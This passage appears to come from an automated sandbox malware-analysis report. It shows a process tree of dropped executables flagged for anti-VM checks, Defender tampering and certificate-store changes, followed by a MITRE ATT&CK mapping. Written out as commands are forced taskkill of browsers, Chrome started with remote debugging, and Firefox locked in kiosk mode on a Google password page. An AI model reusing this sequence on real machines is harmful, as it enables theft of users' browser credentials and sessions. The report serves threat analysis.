        Suspicious use of FindShellTrayWindow
        
        PID:1700
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6529758,0x7fef6529768,0x7fef6529778
        6⤵
        
        PID:2060
      - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        6⤵
        
        PID:916
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1444,i,6328837967925328357,6515485980200486495,131072 /prefetch:2
        6⤵
        
        PID:2904
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1376 --field-trial-handle=1444,i,6328837967925328357,6515485980200486495,131072 /prefetch:8
        6⤵
        
        PID:1052
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1552 --field-trial-handle=1444,i,6328837967925328357,6515485980200486495,131072 /prefetch:8
        6⤵
        
        PID:2976
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1952 --field-trial-handle=1444,i,6328837967925328357,6515485980200486495,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2824
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2328 --field-trial-handle=1444,i,6328837967925328357,6515485980200486495,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:280
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2336 --field-trial-handle=1444,i,6328837967925328357,6515485980200486495,131072 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2616
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        
        PID:836
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6529758,0x7fef6529768,0x7fef6529778
        6⤵
        
        PID:2444
      - C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        6⤵
        
        PID:3832
  - - C:\Users\Admin\AppData\Local\Temp\10329020101\afb03093cf.exe
      "C:\Users\Admin\AppData\Local\Temp\10329020101\afb03093cf.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2092
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1648
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1508
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3572
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:4028
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        6⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1100
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.0.921431426\1919944075" -parentBuildID 20221007134813 -prefsHandle 1204 -prefMapHandle 1196 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b59c43e9-b82e-4095-a4dc-8f063688a548} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 1280 108d8358 gpu
        7⤵
        
        PID:1240
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.1.355237893\1224043210" -parentBuildID 20221007134813 -prefsHandle 1504 -prefMapHandle 1500 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b8d9f54-a956-4b08-b41c-c97db1ee2d7c} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 1516 f5ed958 socket
        7⤵
        
        PID:3524
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.2.1621243629\1177721608" -childID 1 -isForBrowser -prefsHandle 1876 -prefMapHandle 1872 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3407b24f-19f0-4e61-b267-e41aef3192e0} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 1888 e68e58 tab
        7⤵
        
        PID:3136
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.3.69899075\594875735" -childID 2 -isForBrowser -prefsHandle 2668 -prefMapHandle 2664 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e87d68d6-d905-47ac-8be4-656f449405c7} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 2680 e64258 tab
        7⤵
        
        PID:3344
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.4.433767004\1371391311" -childID 3 -isForBrowser -prefsHandle 3824 -prefMapHandle 3820 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0debed4f-5b05-4b04-b0e4-5ccb926c723b} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 3836 1ef4c558 tab
        7⤵
        
        PID:1964
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.5.185453782\362561158" -childID 4 -isForBrowser -prefsHandle 3940 -prefMapHandle 3944 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {022a1f2d-4844-4945-b88e-58c700576379} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 3928 1ea24458 tab
        7⤵
        
        PID:2928
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1100.6.1673362905\35211883" -childID 5 -isForBrowser -prefsHandle 4104 -prefMapHandle 4108 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df4be3da-b8f8-49ee-a440-9581b353f095} 1100 "\\.\pipe\gecko-crash-server-pipe.1100" 4088 1e679c58 tab
        7⤵
        
        PID:2492
  - - C:\Users\Admin\AppData\Local\Temp\10329030101\3e219c5fa8.exe
      "C:\Users\Admin\AppData\Local\Temp\10329030101\3e219c5fa8.exe"
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      Modifies Windows Defender Real-time Protection settings
      Modifies Windows Defender TamperProtection settings
      Modifies Windows Defender notification settings
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Windows security modification
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2476
  - - C:\Users\Admin\AppData\Local\Temp\10329040101\a1648c690b.exe
      "C:\Users\Admin\AppData\Local\Temp\10329040101\a1648c690b.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1740
  - - C:\Users\Admin\AppData\Local\Temp\10329050101\cbcc5b446e.exe
      "C:\Users\Admin\AppData\Local\Temp\10329050101\cbcc5b446e.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      PID:2384
  - - C:\Users\Admin\AppData\Local\Temp\10329060101\9a7d1a3d45.exe
      "C:\Users\Admin\AppData\Local\Temp\10329060101\9a7d1a3d45.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:884
  - - C:\Users\Admin\AppData\Local\Temp\10329070101\5d8dc0c07d.exe
      "C:\Users\Admin\AppData\Local\Temp\10329070101\5d8dc0c07d.exe"
      4⤵
      Executes dropped EXE
      PID:2472
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2472 -s 36
        5⤵
        
        PID:3188
- C:\Users\Admin\AppData\Local\Temp\10320920101\iqvtNlb.exe
  "C:\Users\Admin\AppData\Local\Temp\10320920101\iqvtNlb.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3992

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion